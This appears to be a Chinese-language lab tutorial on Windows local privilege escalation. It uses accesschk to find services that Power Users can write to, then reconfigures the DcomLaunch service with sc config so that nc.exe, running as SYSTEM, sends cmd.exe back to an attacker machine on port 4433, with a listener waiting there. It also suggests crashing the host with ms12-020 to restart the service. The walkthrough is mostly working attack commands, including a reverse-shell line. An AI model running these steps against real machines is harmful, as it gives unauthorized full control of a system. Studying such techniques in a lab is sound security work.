在Windows低权限下利用服务进行提权

用到的工具：accesschk，这个工具可以用来检查用户和用户组对文件，目录，注册表项，全局对象和系统服务的权限，在实际配置权限过程中，如果权限设置不当，那么win服务就可能被用于提权。
下载链接：
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
具体介绍：http://blog.51cto.com/rangercyh/497497

第一次运行会出现一个许可弹窗，可以执行 accesschk.exe /accepteula 来避免弹窗

实验环境 ：

靶机： win2003 sp2 IP：192.168.133.130

攻击机： win7 IP：192.168.133.128

在靶机添加一个用户test，并加入到本地组power users组中
执行命令：
accesschk.exe -uwcqv "Power Users" *

来显示Power User组可以操作的服务名称信息

-u :抑制错误

-w:仅显示具有写访问权限的对象

-c:显示服务名称，输入* 用户与显示所有服务

-q:省略标识

-v:冗长（包括WINDOUWS VISTA完整性级别）

image.png

前面的RW表示有读写权限，其中服务名称为“DcomLaunch”和“kdc”服务可以被simeon用户操作
这里我选“DcomLaunch” 进行测试
然后使用“sc qc DcomLaunch”命令查询DcomLaunch的详细信息

image.png

可以看到是以系统权限运行的
然后我们在看下是否启动了 net start | find "DCOM Server Process Launcher"

image.png

说明服务是启动的
然后在获取这个服务名称提供的服务
运行 tasklist /svc 找到对应服务

image.png

接下来就是修改服务并获取系统权限
这里我们还要配置使用nc反弹shell到我的攻击机上
我们把nc放到c:\windows\temp目录下
使用sc对服务进行修改

sc config DcomLaunch binpath= "C:\windows\temp\nc.exe" -nv 192.168.193.131 4433 -e "C:\WINDOWS\system32\cmd.exe"

*注意binpath=后面一定要有个空格

image.png

我们在查询下服务

image.png

在执行

image.png

obj:指定运行服务将使用的帐户名，或指定运行驱动程序将使用的 Windows 驱动程序对象名。默认设置为 LocalSystem。

password:指定一个密码。如果使用了非 LocalSystem 的帐户，则此项是必需的。
最后使用 net start DcomLaunch 命令（也可以用ms12-020打蓝屏）重启这个服务

image.png

攻击机上用nc进行监听4433即可得到反弹的shell
nc -lvvp 4433